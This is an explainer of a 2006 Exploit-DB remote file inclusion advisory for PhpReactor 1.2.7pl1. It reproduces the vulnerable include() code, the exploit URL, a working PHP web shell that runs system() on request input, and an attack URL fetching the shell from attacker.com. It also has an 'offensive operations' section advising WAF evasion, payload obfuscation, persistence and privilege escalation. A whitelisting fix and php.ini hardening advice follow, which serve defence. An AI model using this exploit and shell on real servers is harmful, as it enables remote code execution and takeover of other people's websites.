PhpReactor 1.2.7pl1 'pathtohomedir' Remote File Inclusion Explained

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability in PhpReactor version 1.2.7pl1. The vulnerability exists in the editprofile.php script and allows an attacker to include arbitrary remote files by manipulating the pathtohomedir parameter. This can lead to the execution of malicious code on the target server.
Simple technical breakdown
The core of the vulnerability lies in how the editprofile.php script handles the pathtohomedir variable. This variable is used to construct the path for including other PHP files, such as database functions, language files, and user functions.
The script uses include() statements that directly incorporate the value of $pathtohomedir without proper sanitization. If an attacker can control $pathtohomedir and point it to a remote URL (e.g., http://attacker.com/shell.txt), the server will attempt to download and execute the content of that remote file as if it were a local PHP script.
Complete code and payload walkthrough
The provided paper snippet focuses on the vulnerable code within editprofile.php and a sample exploit URL.
Vulnerable Code Snippet:
# //INCLUDE DB FUNCTIONS
# if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
# //INCLUDE LANGUAGE FUNCTIONS
# if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
# //INCLUDE USERS FUNCTIONS
# if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
# //INCLUDE BBS FUNCTIONS
# if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
Explanation of Code Blocks:
- if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
  - Purpose: This block attempts to include the database functions file (db.inc.php).
  - !defined("REACTOR_INC_DB"): This is a standard PHP mechanism to prevent a file from being included multiple times. If the constant REACTOR_INC_DB is not defined, this is the first time the file is being included, and the code inside the if block executes.
  - include($pathtohomedir."/inc/db.inc.php"): This is the critical part. It takes the value of the $pathtohomedir variable, appends /inc/db.inc.php to it, and then attempts to include that file. If $pathtohomedir is controlled by an attacker and points to a remote URL, the include function will fetch and execute the content from that URL.
  - Input: The value of $pathtohomedir, which is expected to be a local path.
  - Behavior: Downloads and executes code from the specified path if it is a remote URL.
  - Output: If successful, the functions defined in db.inc.php (or the remote file) become available.
- if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
  - Purpose: Similar to the above, this block includes the language functions file (lang.inc.php).
  - Behavior: Same as the db.inc.php inclusion, but for the language file.
- if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
  - Purpose: Includes the user functions file (users.inc.php).
  - Behavior: Same as the db.inc.php inclusion, but for the user file.
- if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
  - Purpose: Includes the BBS (Bulletin Board System) functions file (bbs.inc.php).
  - Behavior: Same as the db.inc.php inclusion, but for the BBS file.
Exploit URL Snippet:
http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
Explanation of Exploit URL:
- http://[target]/[path]/editprofile.php: This is the standard URL to access the vulnerable script on the target web server. [target] would be the domain name or IP address, and [path] would be the directory where PhpReactor is installed.
- ?pathtohomedir=http://phpshell.txt?: This part is the exploit payload.
  - pathtohomedir=: This is the GET parameter that the editprofile.php script reads.
  - http://phpshell.txt: This is the attacker-controlled remote URL. The attacker would host a file named phpshell.txt on their own server. This file would contain malicious PHP code (e.g., a web shell).
  - ?: The trailing question mark is often used to terminate the URL parameters. In this specific exploit example, it might be intended to ensure that any subsequent parameters on the legitimate URL are ignored, or it might be a stylistic choice. However, the critical part is that http://phpshell.txt is passed as the value for pathtohomedir.
How it works together:
When the editprofile.php script receives the request with pathtohomedir=http://phpshell.txt?, the PHP interpreter will process the include() statements. For example, the first one:
include($pathtohomedir."/inc/db.inc.php");
becomes:
include("http://phpshell.txt?/inc/db.inc.php");
PHP's include function, when given a URL, will attempt to fetch the content from that URL. If http://phpshell.txt contains valid PHP code, it will be executed on the target server. The trailing ?/inc/db.inc.php might be ignored by the remote server or could potentially cause issues depending on how the attacker's web server is configured to handle such requests. A more robust exploit might simply use http://phpshell.txt without the trailing path.
Payload (Conceptual):
The content of http://phpshell.txt would typically be a PHP web shell, such as:
<?php
// Basic web shell
echo "<pre>";
if (isset($_REQUEST['cmd'])) {
system($_REQUEST['cmd']);
} else {
echo "Use ?cmd=your_command to execute commands.";
}
echo "</pre>";
?>
When this is included, the attacker can then send requests like http://[target]/[path]/editprofile.php?pathtohomedir=http://attacker.com/phpshell.txt&cmd=ls -la to execute commands on the server.
Mapping List:
- editprofile.php: The vulnerable script.
- $pathtohomedir: The user-controlled variable that forms the basis of the RFI.
- include(): The PHP function that executes the vulnerability by fetching and executing remote files.
- http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?: The exploit URL structure.
- http://phpshell.txt: The attacker-hosted remote file containing malicious PHP code.
- phpshell.txt content (e.g., web shell): The actual malicious payload.
Practical details for offensive operations teams
- Required Access Level: Low. This is a remote vulnerability exploitable via HTTP GET requests. No prior authentication or local access is required.
- Lab Preconditions:
  - A target server running PhpReactor 1.2.7pl1 or a similarly vulnerable version.
  - The target server must have PHP installed and configured with allow_url_fopen enabled in php.ini. This is crucial for include() to fetch remote files.
  - The target server must be accessible over the network from the attacker's position.
  - An attacker-controlled server to host the malicious payload (e.g., phpshell.txt).
- Tooling Assumptions:
  - A web browser or an HTTP request tool (like curl, Burp Suite, OWASP ZAP) to craft and send the exploit request.
  - A web server (e.g., Apache, Nginx) on the attacker's machine to serve the malicious payload.
  - A text editor to create the malicious payload file.
- Execution Pitfalls:
  - allow_url_fopen disabled: If allow_url_fopen is disabled in the target's php.ini, the include() function will not be able to fetch remote files, and the exploit will fail.
  - Web Application Firewalls (WAFs): Modern WAFs might detect and block requests containing URLs in GET parameters, especially if they look like common RFI patterns.
  - Incorrect Path/URL: Typos in the target URL, the path to editprofile.php, or the attacker's payload URL will cause the exploit to fail.
  - Payload Format: The remote file must contain valid PHP code that can be executed. If it is plain text or malformed PHP, it will not work as intended.
  - Trailing Characters: The exact behavior of the trailing ? in the exploit URL might vary. Sometimes, a simpler pathtohomedir=http://attacker.com/shell.php is more reliable. The paper's example might be specific to a particular server configuration or a slightly different interpretation of how PHP handles include with URLs.
  - File Extension: While the example uses .txt, it is generally better to use a .php extension for the remote payload to ensure it is interpreted as PHP code by the target server.
- Tradecraft Considerations:
  - Reconnaissance: Identify the target application (PhpReactor) and its version. Probe for allow_url_fopen status if possible (though this is difficult remotely without prior knowledge).
  - Payload Hosting: Ensure the payload server is stable and accessible. Consider using a domain that doesn't immediately flag as malicious.
  - Obfuscation: If initial attempts are blocked, consider obfuscating the payload or the URL parameters to bypass WAFs.
  - Post-Exploitation: Once a shell is established, immediately look for ways to maintain persistence and escalate privileges.
Where this was used and when
This vulnerability was published in July 2006. At that time, Remote File Inclusion was a prevalent and highly effective attack vector against PHP applications. PhpReactor was a content management system or forum software, and vulnerabilities like this were common in such web applications before more robust security practices and frameworks became widespread. It's likely this vulnerability was exploited in the wild by various actors targeting websites running this specific version of PhpReactor.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical lesson. Never trust user input. All external inputs (GET, POST, COOKIE, headers) that are used in file operations (like include, require, fopen, file_get_contents) must be rigorously validated and sanitized.
  - Whitelisting: Only allow specific, known-good values. For file paths, this means ensuring they point to expected locations and files.
  - Blacklisting (less effective): Avoid relying solely on blacklisting potentially dangerous characters or patterns, as attackers can often find ways around them.
- Disable allow_url_fopen and allow_url_include: In php.ini, set allow_url_fopen = Off and allow_url_include = Off. This prevents PHP's core functions from fetching remote files, mitigating a vast class of RFI vulnerabilities. If remote file inclusion is absolutely necessary for a legitimate function, it should be implemented with extreme caution and robust validation.
- Use Secure Frameworks: Modern PHP frameworks (e.g., Laravel, Symfony) often provide built-in mechanisms for secure file handling and routing, reducing the likelihood of such vulnerabilities.
- Regular Patching and Updates: Keep all software, including web applications and their dependencies, up to date with the latest security patches.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts. However, WAFs should be a layer of defense, not the sole solution.
- Code Auditing: Regularly audit application code for security flaws, especially in areas that handle user input and file operations.
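The following is an added example of how the four include blocks from editprofile.php could be written so that no request-supplied value ever reaches include(); it is not PhpReactor's own code, and the constant REACTOR_BASE_DIR, the array REACTOR_ALLOWED_INCLUDES and the helpers reactor_resolve_include() and reactor_include() are names chosen for this illustration. It applies the whitelisting lesson above (a fixed base directory plus a list of allowed include names, with a realpath() containment check) and the php.ini lesson (refusing to run with allow_url_include enabled).

```php
<?php
// Added example, not PhpReactor's own code. Names below are assumptions for
// this illustration: REACTOR_BASE_DIR, REACTOR_ALLOWED_INCLUDES,
// reactor_resolve_include(), reactor_include().

// Defence in depth: the interpreter itself should not permit remote includes
// (php.ini: allow_url_include = Off, and allow_url_fopen = Off where possible).
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; set it to Off in php.ini');
}

// Fixed installation root derived from this script's own location. The
// vulnerable version took $pathtohomedir from the request; here the base
// directory is a constant that no GET/POST/COOKIE value can influence.
define('REACTOR_BASE_DIR', realpath(__DIR__));

// Whitelist of include files this script may load. Only these names are ever
// turned into paths; any other value is rejected before include() is reached.
const REACTOR_ALLOWED_INCLUDES = [
    'db'    => 'inc/db.inc.php',
    'lang'  => 'inc/lang.inc.php',
    'users' => 'inc/users.inc.php',
    'bbs'   => 'inc/bbs.inc.php',
];

/**
 * Resolve a whitelisted include name to an absolute path under the base
 * directory. Returns null if the name is not whitelisted, the file does not
 * exist, or the resolved path escapes the base directory (traversal/symlink).
 */
function reactor_resolve_include(string $name): ?string
{
    if (!array_key_exists($name, REACTOR_ALLOWED_INCLUDES)) {
        return null; // e.g. "http://attacker.example/shell.txt?" or "../../etc/passwd"
    }
    $candidate = realpath(REACTOR_BASE_DIR . '/' . REACTOR_ALLOWED_INCLUDES[$name]);
    if ($candidate === false) {
        return null; // file missing; never fall back to a request-supplied path
    }
    // Containment check: realpath() only yields local filesystem paths, so a
    // stream wrapper such as http:// or php:// can never pass this prefix test.
    $prefix = rtrim(REACTOR_BASE_DIR, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/**
 * Replacement for the original include blocks: load a whitelisted file at
 * most once, reusing the guard constants the original code already defined
 * (REACTOR_INC_DB, REACTOR_INC_LANG, REACTOR_INC_USERS, REACTOR_INC_BBS).
 */
function reactor_include(string $name, string $guardConstant): bool
{
    if (defined($guardConstant)) {
        return true; // already loaded
    }
    $path = reactor_resolve_include($name);
    if ($path === null) {
        error_log("reactor_include: refused include name '{$name}'");
        return false;
    }
    define($guardConstant, true);
    require $path;
    return true;
}

// Equivalent of the four vulnerable blocks in editprofile.php. Run stand-alone
// (without the inc/ files present) each call logs a refusal and returns false,
// which is the intended failure mode: a missing file is never replaced by a URL.
reactor_include('db',    'REACTOR_INC_DB');
reactor_include('lang',  'REACTOR_INC_LANG');
reactor_include('users', 'REACTOR_INC_USERS');
reactor_include('bbs',   'REACTOR_INC_BBS');

// Constructed request-style values of the kind the exploit URL carries; both
// resolve to NULL and never reach include().
var_dump(reactor_resolve_include('http://attacker.example/shell.txt?')); // NULL
var_dump(reactor_resolve_include('../../etc/passwd'));                  // NULL
```

The design choice is that the request never names a path at all: the only thing a caller can pass is a short key into the whitelist, and the realpath() prefix check guards against the remaining local-filesystem tricks (symlinked inc/ directories, traversal in a mis-edited whitelist entry). Disabling allow_url_include in php.ini is kept as a separate layer because it protects every other include() in the application, not only the four shown here.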
ASCII visual (if applicable)
This vulnerability is a direct path manipulation, so a complex architecture diagram isn't strictly necessary. However, we can visualize the data flow:
+-----------------+      +-----------------------+      +-------------------+
| Attacker's Host |----->| Target Web Server     |----->| PhpReactor Script |
| (Serves payload)|      | (e.g., Apache/Nginx)  |      | (editprofile.php) |
+-----------------+      +-----------------------+      +---------+---------+
                                                                  |
                                                                  | $pathtohomedir = "http://attacker.com/shell.php"
                                                                  v
                                                        +-------------------+
                                                        | PHP include()     |
                                                        | function          |
                                                        +---------+---------+
                                                                  |
                                                                  | Fetches and executes remote file
                                                                  v
                                                        +-------------------+
                                                        | Attacker's Payload|
                                                        | (shell.php code)  |
                                                        +-------------------+
Source references
- PAPER ID: 2095
- PAPER TITLE: PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
- AUTHOR: CeNGiZ-HaN
- PUBLISHED: 2006-07-31
- KEYWORDS: PHP, webapps
- PAPER URL: https://www.exploit-db.com/papers/2095
- RAW URL: https://www.exploit-db.com/raw/2095
Original Exploit-DB Content (Verbatim)
########################### www.system-defacers.org ###############
# Found By CeNGiZ-HaN cengiz-han@system-defacers.org
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
# Vulnerable Code in editprofile.php
# //INCLUDE DB FUNCTIONS
# if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
# //INCLUDE LANGUAGE FUNCTIONS
# if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
# //INCLUDE USERS FUNCTIONS
# if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
# //INCLUDE BBS FUNCTIONS
# if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
# http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################
#
# W W W . S Y S T E M - D E F A C E R S . O R G
#
##############################################################################
# milw0rm.com [2006-07-31]